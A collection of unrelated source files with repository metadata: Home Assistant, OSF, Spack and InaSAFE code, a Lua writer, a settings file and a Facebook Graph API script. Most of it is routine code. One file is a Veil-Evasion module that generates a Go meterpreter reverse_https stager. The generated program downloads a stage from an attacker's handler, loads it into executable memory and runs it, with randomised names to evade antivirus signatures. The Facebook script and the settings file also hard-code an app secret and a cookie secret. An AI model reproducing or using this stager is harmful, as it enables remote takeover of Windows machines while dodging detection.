        return False
    # Manual configuration
    get_manual_configuration(hass, config, conf, ihc_controller, controller_id)
    # Store controller configuration
    ihc_key = f"ihc{controller_id}"
    hass.data[ihc_key] = {IHC_CONTROLLER: ihc_controller, IHC_INFO: conf[CONF_INFO]}
    # We only want to register the service functions once for the first controller
    if controller_id == 0:
        setup_service_functions(hass)
    return True
def get_manual_configuration(hass, config, conf, ihc_controller, controller_id):
    """Get manual configuration for IHC devices.

    Translates each manually configured device entry into the discovery
    payload format and hands it to the matching platform via
    discovery.load_platform().
    """
    for platform in PLATFORMS:
        discovery_info = {}
        if platform in conf:
            platform_setup = conf.get(platform)
            for sensor_cfg in platform_setup:
                name = sensor_cfg[CONF_NAME]
                device = {
                    "ihc_id": sensor_cfg[CONF_ID],
                    "ctrl_id": controller_id,
                    "product": {
                        "name": name,
                        "note": sensor_cfg.get(CONF_NOTE) or "",
                        "position": sensor_cfg.get(CONF_POSITION) or "",
                    },
                    # Per-platform extras; irrelevant keys are simply None.
                    "product_cfg": {
                        "type": sensor_cfg.get(CONF_TYPE),
                        "inverting": sensor_cfg.get(CONF_INVERTING),
                        "off_id": sensor_cfg.get(CONF_OFF_ID),
                        "on_id": sensor_cfg.get(CONF_ON_ID),
                        "dimmable": sensor_cfg.get(CONF_DIMMABLE),
                        "unit_of_measurement": sensor_cfg.get(CONF_UNIT_OF_MEASUREMENT),
                    },
                }
                discovery_info[name] = device
        if discovery_info:
            discovery.load_platform(hass, platform, DOMAIN, discovery_info, config)
def autosetup_ihc_products(hass: HomeAssistant, config, ihc_controller, controller_id):
    """Auto setup of IHC products from the IHC project file.

    Downloads the project XML from the controller, matches it against the
    auto-setup rules (user override file if present, else the bundled
    ihc_auto_setup.yaml) and loads the discovered devices per platform.
    Returns False when the project cannot be read or the rules are invalid.
    """
    project_xml = ihc_controller.get_project()
    if not project_xml:
        _LOGGER.error("Unable to read project from IHC controller")
        return False
    project = ElementTree.fromstring(project_xml)
    # If an auto setup file exist in the configuration it will override
    yaml_path = hass.config.path(AUTO_SETUP_YAML)
    if not os.path.isfile(yaml_path):
        yaml_path = os.path.join(os.path.dirname(__file__), AUTO_SETUP_YAML)
    yaml = load_yaml_config_file(yaml_path)
    try:
        auto_setup_conf = AUTO_SETUP_SCHEMA(yaml)
    except vol.Invalid as exception:
        _LOGGER.error("Invalid IHC auto setup data: %s", exception)
        return False
    groups = project.findall(".//group")
    for platform in PLATFORMS:
        platform_setup = auto_setup_conf[platform]
        discovery_info = get_discovery_info(platform_setup, groups, controller_id)
        if discovery_info:
            discovery.load_platform(hass, platform, DOMAIN, discovery_info, config)
    return True
def get_discovery_info(platform_setup, groups, controller_id):
    """Build the discovery payload for one IHC platform.

    Walks every project group, matches its products against each auto-setup
    rule's XPath, and emits one device record per matching non-"setting"
    node, keyed by "<group name>_<ihc id>".
    """
    found = {}
    for group in groups:
        group_name = group.attrib["name"]
        for rule in platform_setup:
            for product in group.findall(rule[CONF_XPATH]):
                for node in product.findall(rule[CONF_NODE]):
                    # Nodes flagged as settings are configuration resources,
                    # not controllable devices.
                    if node.attrib.get("setting") == "yes":
                        continue
                    # Resource ids look like "_0x1234"; base-0 int() parses
                    # the hex prefix after the underscore is stripped.
                    ihc_id = int(node.attrib["id"].strip("_"), 0)
                    found[f"{group_name}_{ihc_id}"] = {
                        "ihc_id": ihc_id,
                        "ctrl_id": controller_id,
                        "product": {
                            "name": product.get("name") or "",
                            "note": product.get("note") or "",
                            "position": product.get("position") or "",
                        },
                        "product_cfg": rule,
                    }
    return found
def setup_service_functions(hass: HomeAssistant):
    """Set up the IHC service functions.

    Registers the ihc.set_runtime_value_{bool,int,float} and ihc.pulse
    services.  Each call carries a controller_id so multi-controller
    installs address the right controller (default 0).
    """
    def _get_controller(call):
        # Resolve the controller stored by ihc_setup() under "ihc<id>".
        controller_id = call.data[ATTR_CONTROLLER_ID]
        ihc_key = f"ihc{controller_id}"
        return hass.data[ihc_key][IHC_CONTROLLER]
    def set_runtime_value_bool(call):
        """Set a IHC runtime bool value service function."""
        ihc_id = call.data[ATTR_IHC_ID]
        value = call.data[ATTR_VALUE]
        ihc_controller = _get_controller(call)
        ihc_controller.set_runtime_value_bool(ihc_id, value)
    def set_runtime_value_int(call):
        """Set a IHC runtime integer value service function."""
        ihc_id = call.data[ATTR_IHC_ID]
        value = call.data[ATTR_VALUE]
        ihc_controller = _get_controller(call)
        ihc_controller.set_runtime_value_int(ihc_id, value)
    def set_runtime_value_float(call):
        """Set a IHC runtime float value service function."""
        ihc_id = call.data[ATTR_IHC_ID]
        value = call.data[ATTR_VALUE]
        ihc_controller = _get_controller(call)
        ihc_controller.set_runtime_value_float(ihc_id, value)
    async def async_pulse_runtime_input(call):
        """Pulse a IHC controller input function."""
        ihc_id = call.data[ATTR_IHC_ID]
        ihc_controller = _get_controller(call)
        await async_pulse(hass, ihc_controller, ihc_id)
    hass.services.register(
        DOMAIN,
        SERVICE_SET_RUNTIME_VALUE_BOOL,
        set_runtime_value_bool,
        schema=SET_RUNTIME_VALUE_BOOL_SCHEMA,
    )
    hass.services.register(
        DOMAIN,
        SERVICE_SET_RUNTIME_VALUE_INT,
        set_runtime_value_int,
        schema=SET_RUNTIME_VALUE_INT_SCHEMA,
    )
    hass.services.register(
        DOMAIN,
        SERVICE_SET_RUNTIME_VALUE_FLOAT,
        set_runtime_value_float,
        schema=SET_RUNTIME_VALUE_FLOAT_SCHEMA,
    )
    hass.services.register(
        DOMAIN, SERVICE_PULSE, async_pulse_runtime_input, schema=PULSE_SCHEMA
    )
| aronsky/home-assistant | homeassistant/components/ihc/__init__.py | Python | apache-2.0 | 12,995 |
"""
Custom-written pure go meterpreter/reverse_https stager.
Module built by @b00stfr3ak44
"""
from modules.common import shellcode
from modules.common import helpers
from random import randint
class Payload:
    """Veil-Evasion payload: generates Go source for a shellcode-less
    windows/meterpreter/reverse_https stager.

    generate() emits a Go program that fetches the stage over HTTPS from
    the configured handler and executes it in memory; all Go identifiers
    are randomised to frustrate static signatures.
    """
    def __init__(self):
        # required options
        self.description = "pure windows/meterpreter/reverse_https stager, no shellcode"
        self.language = "Go"
        self.extension = "go"
        self.rating = "Normal"
        # options we require user interaction for - format is {Option : [Value, Description]}
        self.required_options = { "LHOST" : ["", "IP of the metasploit handler"],
                                  "LPORT" : ["", "Port of the metasploit handler"],
                                  "compile_to_exe" : ["Y", "Compile to an executable"]}
    def generate(self):
        """Return the Go stager source as a single string."""
        # Randomised Go identifier names used throughout the template.
        memCommit = helpers.randomString()
        memReserve = helpers.randomString()
        pageExecRW = helpers.randomString()
        kernel32 = helpers.randomString()
        procVirtualAlloc = helpers.randomString()
        base64Url = helpers.randomString()
        virtualAlloc = helpers.randomString()
        size = helpers.randomString()
        addr = helpers.randomString()
        err = helpers.randomString()
        randBase = helpers.randomString()
        length = helpers.randomString()
        foo = helpers.randomString()
        random = helpers.randomString()
        outp = helpers.randomString()
        i = helpers.randomString()
        randTextBase64URL= helpers.randomString()
        getURI = helpers.randomString()
        sumVar = helpers.randomString()
        checksum8 = helpers.randomString()
        uri = helpers.randomString()
        value = helpers.randomString()
        tr = helpers.randomString()
        client = helpers.randomString()
        hostAndPort = helpers.randomString()
        port = self.required_options["LPORT"][0]
        host = self.required_options["LHOST"][0]
        response = helpers.randomString()
        # Random URI length; the checksum8 loop below generates a URI the
        # metasploit handler will accept.
        uriLength = randint(5, 255)
        payload = helpers.randomString()
        bufferVar = helpers.randomString()
        x = helpers.randomString()
        # --- Go source template: imports and VirtualAlloc constants ---
        payloadCode = "package main\nimport (\n\"crypto/tls\"\n\"syscall\"\n\"unsafe\"\n"
        payloadCode += "\"io/ioutil\"\n\"math/rand\"\n\"net/http\"\n\"time\"\n)\n"
        payloadCode += "const (\n"
        payloadCode += "%s = 0x1000\n" %(memCommit)
        payloadCode += "%s = 0x2000\n" %(memReserve)
        payloadCode += "%s = 0x40\n)\n" %(pageExecRW)
        payloadCode += "var (\n"
        payloadCode += "%s = syscall.NewLazyDLL(\"kernel32.dll\")\n" %(kernel32)
        payloadCode += "%s = %s.NewProc(\"VirtualAlloc\")\n" %(procVirtualAlloc, kernel32)
        payloadCode += "%s = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_\"\n)\n" %(base64Url)
        # RWX allocation helper wrapping kernel32!VirtualAlloc.
        payloadCode += "func %s(%s uintptr) (uintptr, error) {\n" %(virtualAlloc, size)
        payloadCode += "%s, _, %s := %s.Call(0, %s, %s|%s, %s)\n" %(addr, err, procVirtualAlloc, size, memReserve, memCommit, pageExecRW)
        payloadCode += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" %(addr, err, addr)
        # Random base64url-text helpers used to build the stager URI.
        payloadCode += "func %s(%s int, %s []byte) string {\n" %(randBase, length, foo)
        payloadCode += "%s := rand.New(rand.NewSource(time.Now().UnixNano()))\n" %(random)
        payloadCode += "var %s []byte\n" %(outp)
        payloadCode += "for %s := 0; %s < %s; %s++ {\n" %(i, i, length, i)
        payloadCode += "%s = append(%s, %s[%s.Intn(len(%s))])\n}\n" %(outp, outp, foo, random, foo)
        payloadCode += "return string(%s)\n}\n" %(outp)
        payloadCode += "func %s(%s int) string {\n" %(randTextBase64URL, length)
        payloadCode += "%s := []byte(%s)\n" %(foo, base64Url)
        payloadCode += "return %s(%s, %s)\n}\n" %(randBase, length, foo)
        # Keep generating random URIs until the 8-bit checksum matches the
        # handler's expected value (92 = msf URI_CHECKSUM_INITW).
        payloadCode += "func %s(%s, %s int) string {\n" %(getURI, sumVar, length)
        payloadCode += "for {\n%s := 0\n%s := %s(%s)\n" %(checksum8, uri, randTextBase64URL, length)
        payloadCode += "for _, %s := range []byte(%s) {\n%s += int(%s)\n}\n" %(value, uri, checksum8, value)
        payloadCode += "if %s%s == %s {\nreturn \"/\" + %s\n}\n}\n}\n" %(checksum8, '%0x100', sumVar, uri)
        # main(): fetch the stage over HTTPS (cert checks disabled), copy it
        # into RWX memory and jump to it via syscall.Syscall.
        payloadCode += "func main() {\n"
        payloadCode += "%s := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}\n" %(tr)
        payloadCode += "%s := http.Client{Transport: %s}\n" %(client, tr)
        payloadCode += "%s := \"https://%s:%s\"\n" %(hostAndPort, host, port)
        payloadCode += "%s, _ := %s.Get(%s + %s(92, %s))\n" %(response, client, hostAndPort, getURI, uriLength)
        payloadCode += "defer %s.Body.Close()\n" %(response)
        payloadCode += "%s, _ := ioutil.ReadAll(%s.Body)\n" %(payload, response)
        payloadCode += "%s, _ := %s(uintptr(len(%s)))\n" %(addr, virtualAlloc, payload)
        payloadCode += "%s := (*[890000]byte)(unsafe.Pointer(%s))\n" %(bufferVar, addr)
        payloadCode += "for %s, %s := range %s {\n" %(x, value, payload)
        payloadCode += "%s[%s] = %s\n}\n" %(bufferVar, x, value)
        payloadCode += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" %(addr)
        return payloadCode
| jorik041/Veil-Evasion | modules/payloads/go/meterpreter/rev_https.py | Python | gpl-3.0 | 5,164 |
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 03 15:39:01 2014
@author: FábioPhillip
"""
#!/usr/bin/python
# coding: utf-8
# Python 2 script: obtains a Facebook app access token (by shelling out to
# curl against the Graph API) and then runs a few sample Graph queries.
import facebook
import urllib
import urlparse
import subprocess
import warnings
# Hide deprecation warnings. The facebook module isn't that up-to-date (facebook.GraphAPIError).
warnings.filterwarnings('ignore', category=DeprecationWarning)
# Parameters of your app and the id of the profile you want to mess with.
# SECURITY NOTE(review): the app id/secret are hard-coded and committed to the
# repository; they should be rotated and loaded from the environment instead.
FACEBOOK_APP_ID = '1492384741023161'
FACEBOOK_APP_SECRET = '83476e8740c87f9a4689a2c9da63b158'
FACEBOOK_PROFILE_ID = '1492384741023161' # same as APP_ID ("mesmo de APP_ID")
# Trying to get an access token. Very awkward.
# Build the client-credentials OAuth query string and fetch it with curl,
# capturing stdout as the raw "access_token=..." querystring response.
oauth_args = dict(client_id = FACEBOOK_APP_ID,
                  client_secret = FACEBOOK_APP_SECRET,
                  grant_type = 'client_credentials')
oauth_curl_cmd = ['curl',
                  'https://graph.facebook.com/oauth/access_token?' + urllib.urlencode(oauth_args)]
oauth_response = subprocess.Popen(oauth_curl_cmd,
                                  stdout = subprocess.PIPE,
                                  stderr = subprocess.PIPE).communicate()[0]
try:
    # Parse the querystring-style response; a KeyError here means Facebook
    # did not return a token (handled below).
    oauth_access_token = urlparse.parse_qs(str(oauth_response))['access_token'][0]
    #print oauth_access_token
    token_adquirido = facebook.get_app_access_token(FACEBOOK_APP_ID, FACEBOOK_APP_SECRET)
    print token_adquirido
    g = facebook.GraphAPI(token_adquirido)
    # Execute a few sample queries
    # BUG(review): `pp` is never defined or imported anywhere in this file, so
    # the first pp(...) call below raises NameError at runtime (pprint.pprint
    # was presumably intended — confirm).
    print '---------------'
    print 'Me'
    print '---------------'
    pp(g.get_object('me'))
    print
    print '---------------'
    print 'My Friends'
    print '---------------'
    pp(g.get_connections('me', 'friends'))
    print
    print '---------------'
    print 'Cassio'
    print '---------------'
    pp(g.get_object('100003138583807'))
    print
except KeyError:
    print('Unable to grab an access token!')
    exit()
facebook_graph = facebook.GraphAPI(oauth_access_token)
# Try to post something on the wall.
| Topicos-3-2014/friendlyadvice | tentativaFacebookToken.py | Python | epl-1.0 | 1,977 |
# -*- coding: utf-8 -*-
import collections
import json
import bleach
def strip_html(unclean, tags=None):
    """Sanitize a string, removing (as opposed to escaping) HTML tags

    :param unclean: A string to be stripped of HTML tags
    :param tags: Optional list of tag names to whitelist (kept rather than
        stripped); defaults to stripping every tag.
    :return: stripped string
    :rtype: str
    """
    if not tags:
        tags = []
    # We make this noop for non-string, non-collection inputs so this function can be used with higher-order
    # functions, such as rapply (recursively applies a function to collections)
    if not isinstance(unclean, basestring) and not is_iterable(unclean) and unclean is not None:
        return unclean
    return bleach.clean(unclean, strip=True, tags=tags, attributes=[], styles=[])
# TODO: Not used anywhere except unit tests? Review for deletion
def clean_tag(data):
    """Format as a valid Tag

    :param data: A string to be cleaned
    :return: cleaned string
    :rtype: str
    """
    # TODO: make this a method of Tag?
    # Quotes must be replaced by their HTML entities so the value is safe to
    # embed inside attribute quoting.  The previous revision had the entity
    # strings themselves decoded back to plain quote characters (making both
    # replace() calls no-ops, and leaving an unbalanced quote in the source);
    # restore the literal entity text.
    return escape_html(data).replace('"', '&quot;').replace("'", '&#39;')
def is_iterable(obj):
    # True when obj is registered as iterable via the collections ABC.
    # NOTE: collections.Iterable is the Python 2 location; on Python 3 it
    # lives in collections.abc (and was removed from collections in 3.10).
    return isinstance(obj, collections.Iterable)
def is_iterable_but_not_string(obj):
    """Return True if ``obj`` is an iterable object that isn't a string."""
    # All string types (str/unicode/bytes) expose .strip(), which is the
    # heuristic used here to exclude them.
    if hasattr(obj, 'strip'):
        return False
    return is_iterable(obj)
def escape_html(data):
    """Escape HTML characters in data (as opposed to stripping them out entirely). Will ignore whitelisted tags.

    Recurses into dicts and non-string iterables, returning a cleaned copy
    with the same structure.
    :param data: A string, dict, or list to clean of HTML characters
    :return: A cleaned object
    :rtype: str or list or dict
    """
    if isinstance(data, dict):
        return {
            key: escape_html(value)
            for (key, value) in data.iteritems()
        }
    if is_iterable_but_not_string(data):
        return [
            escape_html(value)
            for value in data
        ]
    if isinstance(data, basestring):
        # Default bleach.clean() escapes disallowed markup rather than
        # stripping it.
        return bleach.clean(data)
    # Non-string scalars (ints, None, ...) pass through untouched.
    return data
# FIXME: Doesn't raise either type of exception expected, and can probably be deleted along with sole use
def assert_clean(data):
    """Ensure that data is cleaned

    :raise: AssertionError
    """
    # NOTE(review): _ensure_clean is defined but never invoked, so neither the
    # ValueError below nor the documented AssertionError can ever be raised;
    # this function currently just returns escape_html(data).
    def _ensure_clean(value):
        if value != bleach.clean(value):
            raise ValueError
    return escape_html(data)
# TODO: Remove unescape_entities when mako html safe comes in
def unescape_entities(value, safe=None):
    """
    Convert HTML-encoded data (stored in the database) to literal characters.

    Intended primarily for endpoints consumed by frameworks that handle their own escaping (eg Knockout)

    :param value: A string, dict, or list
    :param safe: A dict of escape sequences and characters that can be used to extend the set of
        characters that this function will unescape. Use with caution as there are few cases in which
        there will be reason to unescape characters beyond '&'.
    :return: A string or list or dict without html escape characters
    """
    # Map each escape sequence to the literal character it decodes to.  The
    # previous revision mapped '&' to itself (the '&amp;' key had been
    # entity-decoded at some point), which made the default case a no-op;
    # restore the literal escape-sequence key.
    safe_characters = {
        '&amp;': '&',
    }
    if safe and isinstance(safe, dict):
        safe_characters.update(safe)
    if isinstance(value, dict):
        # Recurse into values; keys are left untouched.
        return {
            key: unescape_entities(value, safe=safe_characters)
            for (key, value) in value.iteritems()
        }
    if is_iterable_but_not_string(value):
        return [
            unescape_entities(each, safe=safe_characters)
            for each in value
        ]
    if isinstance(value, basestring):
        for escape_sequence, character in safe_characters.items():
            value = value.replace(escape_sequence, character)
        return value
    return value
def temp_ampersand_fixer(s):
    """As a workaround for ampersands stored as escape sequences in database, unescape text before use on a safe page

    Explicitly differentiate from safe_unescape_html in case use cases/behaviors diverge
    """
    # Replace the stored '&amp;' escape sequence with a literal ampersand.
    # The previous revision replaced '&' with itself (the pattern had been
    # entity-decoded somewhere along the way), making this function a no-op.
    return s.replace('&amp;', '&')
def safe_json(value):
    """
    Dump a string to JSON in a manner that can be used for JS strings in mako templates.

    Providing additional forward-slash escaping to prevent injection of closing markup in strings. See:
    http://benalpert.com/2012/08/03/preventing-xss-json.html

    :param value: A string to be converted
    :return: A JSON-formatted string that explicitly escapes forward slashes when needed
    """
    # Escape every "</" so a value like "</script>" cannot terminate the
    # surrounding <script> block when interpolated into a template.
    dumped = json.dumps(value)
    return dumped.replace('</', '<\\/')
| crcresearch/osf.io | website/util/sanitize.py | Python | apache-2.0 | 4,413 |
# -*- coding: utf-8 -*-
from base_writer import BaseWriter
class LuaWriter(BaseWriter):
    # Serializes sheet data as a Lua module.  Python 2 code: relies on
    # list-returning dict.keys() plus list.sort(), the `unicode` type, and the
    # old ``raise TypeError, msg`` statement syntax.

    def begin_write(self):
        # Emit the Lua module header before any values are written.
        super(LuaWriter, self).begin_write()
        self.output("module(...)", "\n\n")

    def write_sheet(self, name, sheet):
        """Write one sheet as a Lua table.

        For the main sheet also emit its entry count ("main_length") and a
        sorted key list ("main_keys"), both written inline (max_indent 0).
        """
        self.write_value(name, sheet)
        if name == "main_sheet":
            self.write_value("main_length", len(sheet), 0)
            keys = sheet.keys()
            keys.sort()
            self.write_value("main_keys", keys, 0)
        self.flush()

    def write_value(self, name, value, max_indent = None):
        """Write one named value as ``name = <lua literal>``.

        :param max_indent: deepest nesting level that still gets one element
            per line; ``None`` means use the writer's default.
        """
        self.write_types_comment(name)
        if max_indent is None:
            max_indent = self.max_indent
        self.output(name, " = ")
        self.write(value, 1, max_indent)
        self.output("\n\n")
        self.flush()

    def write_comment(self, comment):
        # Lua single-line comment.
        self.output("-- ", comment, "\n")

    def write(self, value, indent = 1, max_indent = 0):
        """Recursively emit *value* as a Lua literal.

        Dispatches on the exact Python type; dict keys are sorted so output
        is deterministic.  Raises TypeError for unsupported types.
        """
        output = self.output
        if value is None:
            return output("nil")
        tp = type(value)
        if tp == bool:
            output("true" if value else "false")
        elif tp == int:
            output("%d" % (value, ))
        elif tp == float:
            # %g drops trailing zeros.
            output("%g" % (value, ))
        elif tp == str:
            output('"%s"' %(value, ))
        elif tp == unicode:
            output('"%s"' % (value.encode("utf-8"), ))
        elif tp == tuple or tp == list:
            # Lua array-style table: { v1, v2, ... }
            output("{")
            for v in value:
                self.newline_indent(indent, max_indent)
                self.write(v, indent + 1, max_indent)
                output(", ")
            if len(value) > 0 and indent <= max_indent:
                output("\n")
                self._output(indent - 1, "}")
            else:
                output("}")
        elif tp == dict:
            # Lua map-style table: { [k] = v, ... } with sorted keys.
            output("{")
            keys = value.keys()
            keys.sort()
            for k in keys:
                self.newline_indent(indent, max_indent)
                output("[")
                self.write(k)
                output("] = ")
                self.write(value[k], indent + 1, max_indent)
                output(", ")
            if len(value) > 0 and indent <= max_indent:
                output("\n")
                self._output(indent - 1, "}")
            else:
                output("}")
        else:
            raise TypeError, "unsupported type %s" % (str(tp), )
        return

    def newline_indent(self, indent, max_indent):
        # Start a new indented line only while within the pretty-print depth;
        # deeper levels stay on one line.
        if indent <= max_indent:
            self.output("\n")
            self._output(indent)
| youlanhai/ExcelToCode | xl2code/writers/lua_writer.py | Python | mit | 2,039 |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Bcftools(Package):
    """BCFtools is a set of utilities that manipulate variant calls in the
    Variant Call Format (VCF) and its binary counterpart BCF. All
    commands work transparently with both VCFs and BCFs, both
    uncompressed and BGZF-compressed."""

    homepage = "http://samtools.github.io/bcftools/"
    url = "https://github.com/samtools/bcftools/releases/download/1.3.1/bcftools-1.3.1.tar.bz2"

    # Known releases and their checksums.
    version('1.4', '50ccf0a073bd70e99cdb3c8be830416e')
    version('1.3.1', '575001e9fca37cab0c7a7287ad4b1cdb')

    depends_on('zlib')
    # bzip2 only became a requirement with the 1.4 release onwards.
    depends_on('bzip2', when="@1.4:")
    # build fails without xz
    # NOTE(review): this constraint pins exactly 1.4 while bzip2 uses the
    # open range "@1.4:"; confirm whether xz is also needed for later versions.
    depends_on('xz', when="@1.4")

    def install(self, spec, prefix):
        # bcftools uses a plain Makefile; point it at the Spack prefix.
        make("prefix=%s" % prefix, "all")
        make("prefix=%s" % prefix, "install")
| TheTimmy/spack | var/spack/repos/builtin/packages/bcftools/package.py | Python | lgpl-2.1 | 2,053 |
import os.path
def settingConfig():
    """Build and return the web application settings dict (Tornado-style keys).

    Template and static paths are resolved relative to this module's own
    directory, so the app works regardless of the current working directory.

    SECURITY NOTE(review): the cookie secret is hard-coded in source; consider
    loading it from the environment or a config file instead.
    """
    here = os.path.dirname(__file__)
    return {
        'template_path': os.path.join(here, 'template'),
        'static_path': os.path.join(here, 'static'),
        'cookie_secret': '0g+Z/5RWQQSS4WL8wyyHvTtfkybuNU1Vr4luVE/Szvg=',
        'xsrf_cookies': True,
    }
| initiali/webrasp | settings.py | Python | apache-2.0 | 360 |
"""**Tests for map creation in QGIS plugin.**
"""
__author__ = 'Tim Sutton <tim@linfiniti.com>'
__revision__ = '$Format:%H$'
__date__ = '01/11/2010'
__license__ = "GPL"
__copyright__ = 'Copyright 2012, Australia Indonesia Facility for '
__copyright__ += 'Disaster Reduction'
import unittest
from unittest import expectedFailure
import os
import logging
# Add PARENT directory to path to make test aware of other modules
#pardir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
#sys.path.append(pardir)
from PyQt4 import QtGui
from qgis.core import (QgsMapLayerRegistry,
QgsRectangle,
QgsComposerPicture)
from qgis.gui import QgsMapCanvasLayer
from safe_qgis.safe_interface import temp_dir, unique_filename
from safe_qgis.utilities_test import (getQgisTestApp,
loadLayer,
setJakartaGeoExtent,
checkImages)
from safe_qgis.utilities import setupPrinter, dpiToMeters, qgisVersion
from safe_qgis.map import Map
# Shared QGIS test fixtures for the whole module; getQgisTestApp() returns a
# 4-tuple unpacked into the application, map canvas, iface and parent widget.
QGISAPP, CANVAS, IFACE, PARENT = getQgisTestApp()
# Module-level logger named to match InaSAFE's logging hierarchy.
LOGGER = logging.getLogger('InaSAFE')
class MapTest(unittest.TestCase):
    """Test the InaSAFE Map generator"""

    def setUp(self):
        """Setup fixture run before each tests"""
        # Start every test with an empty layer registry so state cannot leak
        # between tests.
        myRegistry = QgsMapLayerRegistry.instance()
        myRegistry.removeAllMapLayers()

    def test_printToPdf(self):
        """Test making a pdf of the map - this is the most typical use of map.
        """
        LOGGER.info('Testing printToPdf')
        myLayer, _ = loadLayer('test_shakeimpact.shp')
        myCanvasLayer = QgsMapCanvasLayer(myLayer)
        CANVAS.setLayerSet([myCanvasLayer])
        # Zoom the canvas to a small Jakarta extent before composing.
        myRect = QgsRectangle(106.7894, -6.2308, 106.8004, -6.2264)
        CANVAS.setExtent(myRect)
        CANVAS.refresh()
        myMap = Map(IFACE)
        myMap.setImpactLayer(myLayer)
        myMap.composeMap()
        myPath = unique_filename(prefix='mapPdfTest',
                                 suffix='.pdf',
                                 dir=temp_dir('test'))
        myMap.printToPdf(myPath)
        LOGGER.debug(myPath)
        myMessage = 'Rendered output does not exist: %s' % myPath
        assert os.path.exists(myPath), myMessage
        # pdf rendering is non deterministic so we can't do a hash check
        # test_renderComposition renders just the image instead of pdf
        # so we hash check there and here we just do a basic minimum file
        # size check.
        mySize = os.stat(myPath).st_size
        myExpectedSize = 352798  # as rendered on linux ub 12.04 64
        myMessage = 'Expected rendered map pdf to be at least %s, got %s' % (
            myExpectedSize, mySize)
        assert mySize >= myExpectedSize, myMessage

    def test_renderComposition(self):
        """Test making an image of the map only."""
        LOGGER.info('Testing renderComposition')
        myLayer, _ = loadLayer('test_shakeimpact.shp')
        myCanvasLayer = QgsMapCanvasLayer(myLayer)
        CANVAS.setLayerSet([myCanvasLayer])
        myRect = QgsRectangle(106.7894, -6.2308, 106.8004, -6.2264)
        CANVAS.setExtent(myRect)
        CANVAS.refresh()
        myMap = Map(IFACE)
        myMap.setImpactLayer(myLayer)
        myMap.composeMap()
        myImagePath, myControlImage, myTargetArea = myMap.renderComposition()
        LOGGER.debug(myImagePath)
        assert myControlImage is not None
        # Check the rendered page geometry matches an A3-at-300dpi-sized area.
        myDimensions = [myTargetArea.left(),
                        myTargetArea.top(),
                        myTargetArea.bottom(),
                        myTargetArea.right()]
        myExpectedDimensions = [0.0, 0.0, 3507.0, 2480.0]
        myMessage = 'Expected target area to be %s, got %s' % (
            str(myExpectedDimensions), str(myDimensions))
        assert myExpectedDimensions == myDimensions, myMessage
        myMessage = 'Rendered output does not exist'
        assert os.path.exists(myImagePath), myMessage
        # Per-platform control images: rendering differs slightly by OS/Qt.
        myAcceptableImages = ['renderComposition.png',
                              'renderComposition-variantUB12.04.png',
                              'renderComposition-variantUB12.10.png',
                              'renderComposition-variantWindosVistaSP2-32.png',
                              'renderComposition-variantJenkins.png',
                              'renderComposition-variantUB11.10-64.png',
                              'renderComposition-variantUB11.04-64.png']
        # Beta version and version changes can introduce a few extra chars
        # into the metadata section so we set a reasonable tolerance to cope
        # with this.
        myTolerance = 8000
        myFlag, myMessage = checkImages(myAcceptableImages,
                                        myImagePath,
                                        myTolerance)
        assert myFlag, myMessage

    def test_getMapTitle(self):
        """Getting the map title from the keywords"""
        myLayer, _ = loadLayer('test_floodimpact.tif')
        myMap = Map(IFACE)
        myMap.setImpactLayer(myLayer)
        myTitle = myMap.getMapTitle()
        myExpectedTitle = 'Penduduk yang Mungkin dievakuasi'
        myMessage = 'Expected: %s\nGot:\n %s' % (myExpectedTitle, myTitle)
        assert myTitle == myExpectedTitle, myMessage

    def test_handleMissingMapTitle(self):
        """Missing map title from the keywords fails gracefully"""
        # TODO running OSM Buildngs with Pendudk Jakarta
        # wasthrowing an error when requesting map title
        # that this test wasnt replicating well
        myLayer, _ = loadLayer('population_padang_1.asc')
        myMap = Map(IFACE)
        myMap.setImpactLayer(myLayer)
        myTitle = myMap.getMapTitle()
        # A layer with no title keyword should yield None, not raise.
        myExpectedTitle = None
        myMessage = 'Expected: %s\nGot:\n %s' % (myExpectedTitle, myTitle)
        assert myTitle == myExpectedTitle, myMessage

    # Renamed with an X prefix so the runner's 'test' pattern skips it;
    # also marked expectedFailure as belt-and-braces.
    @expectedFailure
    def Xtest_renderTemplate(self):
        """Test that load template works"""
        #Use the template from our resources bundle
        myInPath = ':/plugins/inasafe/basic.qpt'
        myLayer, _ = loadLayer('test_shakeimpact.shp')
        myCanvasLayer = QgsMapCanvasLayer(myLayer)
        CANVAS.setLayerSet([myCanvasLayer])
        myMap = Map(IFACE)
        setJakartaGeoExtent()
        myMap.setImpactLayer(myLayer)
        myPath = unique_filename(prefix='outTemplate',
                                 suffix='.pdf',
                                 dir=temp_dir('test'))
        LOGGER.debug(myPath)
        myMap.renderTemplate(myInPath, myPath)
        assert os.path.exists(myPath)
        #os.remove(myPath)

    def test_windowsDrawingArtifacts(self):
        """Test that windows rendering does not make artifacts"""
        # sometimes spurious lines are drawn on the layout
        LOGGER.info('Testing windowsDrawingArtifacts')
        myPath = unique_filename(prefix='artifacts',
                                 suffix='.pdf',
                                 dir=temp_dir('test'))
        myMap = Map(IFACE)
        setupPrinter(myPath)
        myMap.setupComposition()
        # Tiny grey test image rendered three different ways below.
        myImage = QtGui.QImage(10, 10, QtGui.QImage.Format_RGB32)
        myImage.setDotsPerMeterX(dpiToMeters(300))
        myImage.setDotsPerMeterY(dpiToMeters(300))
        #myImage.fill(QtGui.QColor(250, 250, 250))
        # Look at the output, you will see antialiasing issues around some
        # of the boxes drawn...
